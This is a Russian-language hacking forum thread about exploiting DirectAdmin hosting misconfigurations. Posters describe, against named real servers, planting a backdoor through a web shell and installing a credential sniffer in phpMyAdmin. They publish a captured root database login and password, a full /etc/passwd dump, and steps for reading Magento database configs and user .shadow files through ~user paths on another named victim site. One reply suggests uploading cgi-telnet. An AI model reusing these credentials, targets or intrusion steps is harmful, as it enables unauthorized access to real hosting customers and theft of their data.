Касяки DirectAdmin'a

Discussion in 'Этичный хакинг или пентестинг' started by winstrool, 22 Aug 2016.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Не важно как у меня оказался шел, сама суть!

    На скриншоте видем что, у нас нет выполнения консоли, базе дир закрыт и куча отключенных полезныхфункций.
    хочу заметить что в директ админе архитектура папок строится так:
    /home/ofirwine/domains/ofirwinery.co.il/public_html/ - где ofirwine это нашь юзер(юзерская папка).
    [​IMG]


    в директ админе есть такая характерность/возможность оброщаться на прямую через IP к папке пользователя т.е в нашем случае это будет так:
    http://80.179.148.242/~ofirwine/

    а теперь посмотрим что нам покажет шелле в Sec. Info:
    [​IMG]

    В данном примере изменился open_base_dir на практике и disable_function тоже отключается в некоторых моментах, зависит от внимательности админа.

    переходим в открывшийся нам путь: /var/www/html/
    мне повезло ;) есть файлы расшареные, внедряем в них бегдор и перезаливаемся с IP обратившись на прямую, получаем шелл с текущими правами:
    [​IMG]

    в пхпмиадмин я встроил сниф, спустя какоето время собрался лог где попался рутовый юзер:
    http://80.179.148.242/phpmyadmin/err.txt - da_admin:fAWj4_oq

    доступ к phpmyadmin как через домен:
    http://www.ofirwinery.co.il/phpmyadmin/
    так и через IP:
    http://80.179.148.242/phpmyadmin/

    ну а дальше в БД палим домены и заливаемся дальше по порядку....




    root access for BD
    https://www.hostingblog.co.il/phpmyadmin/ da_admin:fAWj4_oq

    User for you hosting, access for all sites

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:eek:perator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sb...
    saslauth:x:499:76:"Saslauthd user":/var/empty/sasl...
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    sshd:x:74:74:privilege-separated SSH:/var/empty/ss...
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    named:x:25:25:Named:/var/named:/sbin/nologin
    apache:x:498:500::/var/www:/bin/false
    diradmin:x:497:497::/usr/local/directadmin:/bin/fa...
    mysql:x:496:496:MySQL server:/var/lib/mysql:/bin/f...
    majordomo:x:495:2::/etc/virtual/majordomo:/bin/fal...
    webapps:x:500:501::/var/www/html:/bin/false
    dovecot:x:494:494::/home/dovecot:/bin/false
    admin:x:501:502::/home/admin:/bin/bash
    avih:x:502:504::/home/avih:/bin/bash
    aattia:x:503:505::/home/aattia:/bin/bash
    dannyg:x:504:506::/home/dannyg:/bin/bash
    spdsupport:x:505:507::/home/spdsupport:/bin/bash
    exploitest:x:507:509::/home/exploitest:/bin/false
    dbus:x:81:81:System message bus:/:/sbin/nologin
    fadidate:x:508:510::/home/fadidate:/bin/false
    sysblogt:x:509:511::/home/sysblogt:/bin/false
    linguior:x:510:512::/home/linguior:/bin/false
    hayokrac:x:511:513::/home/hayokrac:/bin/false
    abicoil:x:512:514::/home/abicoil:/bin/false
    nofzuqim:x:515:517::/home/nofzuqim:/bin/false
    itaorgil:x:517:519::/home/itaorgil:/bin/false
    pitzoico:x:518:520::/home/pitzoico:/bin/false
    outlooko:x:519:521::/home/outlooko:/bin/false
    lobizcoi:x:520:522::/home/lobizcoi:/bin/false
    tzioname:x:521:523::/home/tzioname:/bin/false
    shairudi:x:522:524::/home/shairudi:/bin/false
    shearimt:x:524:526::/home/shearimt:/bin/false
    vetpetco:x:525:527::/home/vetpetco:/bin/false
    ashdodne:x:526:528::/home/ashdodne:/bin/false
    miriamte:x:527:529::/home/miriamte:/bin/false
    dfusimpr:x:528:530::/home/dfusimpr:/bin/false
    eynatcoi:x:529:531::/home/eynatcoi:/bin/false
    hostingblg:x:530:532::/home/hostingblg:/bin/false
    aefcoil:x:531:533::/home/aefcoil:/bin/false
    innovati:x:532:534::/home/innovati:/bin/false
    shimitem:x:533:535::/home/shimitem:/bin/false
    electron:x:534:536::/home/electron:/bin/false
    heskemor:x:535:537::/home/heskemor:/bin/false
    chiropra:x:536:538::/home/chiropra:/bin/false
    wwwtempu:x:537:539::/home/wwwtempu:/bin/false
    bernywww:x:538:540::/home/bernywww:/bin/false
    mabasirc:x:539:541::/home/mabasirc:/bin/false
    tomaticc:x:541:543::/home/tomaticc:/bin/false
    idgucoil:x:543:545::/home/idgucoil:/bin/false
    jdmusicc:x:544:546::/home/jdmusicc:/bin/false
    rewoodco:x:545:547::/home/rewoodco:/bin/false
    leebaorg:x:546:548::/home/leebaorg:/bin/false
    magnetic:x:547:549::/home/magnetic:/bin/false
    composto:x:549:551::/home/composto:/bin/false
    haderech:x:551:553::/home/haderech:/bin/false
    zipporic:x:554:556::/home/zipporic:/bin/false
    bookidsc:x:557:559::/home/bookidsc:/bin/false
    ofirwine:x:560:562::/home/ofirwine:/bin/false
    shaonico:x:562:564::/home/shaonico:/bin/false
    priorgan:x:567:569::/home/priorgan:/bin/false
    ebikedep:x:569:571::/home/ebikedep:/bin/false
    tempurl1:x:571:573::/home/tempurl1:/bin/false
    adicohen:x:572:574::/home/adicohen:/bin/false
    banandac:x:574:576::/home/banandac:/bin/false
    hairatem:x:575:577::/home/hairatem:/bin/false
    gigicoil:x:577:580::/home/gigicoil:/bin/false
    dgimarke:x:578:581::/home/dgimarke:/bin/false
    inemuseu:x:579:582::/home/inemuseu:/bin/false
    pybizcoi:x:581:584::/home/pybizcoi:/bin/false
    newmeita:x:582:585::/home/newmeita:/bin/false
    lansmoto:x:584:587::/home/lansmoto:/bin/false
    iireccoi:x:585:588::/home/iireccoi:/bin/false
    digimaco:x:586:589::/home/digimaco:/bin/false
    coil123:x:590:593::/home/coil123:/bin/false
    yolotech:x:592:595::/home/yolotech:/bin/false
    asiorenc:x:593:596::/home/asiorenc:/bin/false
    danceres:x:595:598::/home/danceres:/bin/false
    imabacoi:x:596:599::/home/imabacoi:/bin/false
    karinara:x:597:600::/home/karinara:/bin/false
    dikursin:x:598:601::/home/dikursin:/bin/false
    oldgames:x:599:602::/home/oldgames:/bin/false
    ticoutem:x:602:605::/home/ticoutem:/bin/false
    yaronrla:x:604:607::/home/yaronrla:/bin/false
    bestcard:x:605:608::/home/bestcard:/bin/false
    davidcom:x:606:609::/home/davidcom:/bin/false
    medisonp:x:607:610::/home/medisonp:/bin/false
    gufcoil:x:608:611::/home/gufcoil:/bin/false
    cleanshi:x:609:612::/home/cleanshi:/bin/false
    talktohe:x:610:613::/home/talktohe:/bin/false
    etsbacoi:x:611:614::/home/etsbacoi:/bin/false
    hadassin:x:612:615::/home/hadassin:/bin/false
    nirslav1:x:613:616::/home/nirslav1:/bin/false
    ilanmare:x:614:617::/home/ilanmare:/bin/false
    dfactory:x:617:620::/home/dfactory:/bin/false
    hvaitami:x:618:621::/home/hvaitami:/bin/false
    ogentemp:x:619:622::/home/ogentemp:/bin/false
    valtechc:x:620:623::/home/valtechc:/bin/false
    saraweis:x:622:625::/home/saraweis:/bin/false
    excelvba:x:623:626::/home/excelvba:/bin/false
    beckmedi:x:624:627::/home/beckmedi:/bin/false
    boobjobc:x:625:628::/home/boobjobc:/bin/false
    dezionco:x:626:629::/home/dezionco:/bin/false
    bronstei:x:630:633::/home/bronstei:/bin/false
    liatbeau:x:632:635::/home/liatbeau:/bin/false


    P.S: Владельцы сервака, своевременно были осведомлены о данной баги и своевременно ее устранили. Данная статья несет в себе характер, чисто в ознакомительных целях.
     
    _________________________
    #1 winstrool, 22 Aug 2016
    Last edited: 26 Dec 2018
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    KIR@PRO
    Вот какраз при дефолте и работает, тут есть еще одна фишка, рабочию площадку на досуге найду... покажу...

    P.S: там суть в связке magento+directadmin, свободное чтение при дефолтных настройках "app/etc/local.xml" где хронятся данные от БД и путь к админке, примерный путь выглядит так... "http://127.0.0.1/~USERNAME/app/etc/local.xml" сервак с дефолтными настройками htaccess'ом не обременен
     
    _________________________
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    вот пример на Magento+DirectAdmin

    жертва: https://www.smitsarnhem.nl/
    смотрим пхпинфо или ищем раскрытие путей
    https://www.smitsarnhem.nl/phpinfo.php
    _SERVER["DOCUMENT_ROOT"] /home/smitsarn/domains/smitsarnhem.nl/private_html
    т.е smitsarn является нашим юзером, идем дальше...

    http://194.247.31.208/~smitsarn/app/etc/local.xml читаем конфиг

    phpmyadmin лежит по дефолту всегда:

    http://194.247.31.208/phpMyAdmin/
    https://www.smitsarnhem.nl/phpMyAdmin/

    а дальше уже дело техник....

    еще касяк, нам полностью доступна пака /home/%USERNAME%/ где /home/%USERNAME%/.shadow лежит пасс от аккаунта %USERNAME%
     
    _________________________
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Как ты узнал, что тут DirectAdmin ?
     
    _________________________
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _________________________
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Дошли руки, решил потестить... И ничего не сработало...

    Покажи наглядно как тут прочитать конфиги?

    Пример 1:

    Code:
    elearnise.com:2222
    
    http://elearnise.com/phpinfo.php
    Пример 2:

    Code:
    thaimultiply.com:2222
    
    http://thaimultiply.com/info.php
     
    _________________________
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _________________________
  8. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    покопай в сторону CPanel тоже, там такой же косяк с путями ~, но по дефолту там по конфигам апача стоит deny на .ht/sh(хз как тебе удалось прочитать), получается на каждый сервер индивидуальный случай, зависит от кривизны настроек... и ещё есть красивый косячёк, под правами юзера пишем в cgi-bin тот же cgi-telnet, ставим права, через ~ заходим по ипу и обходим настройки серванта....
     
    _________________________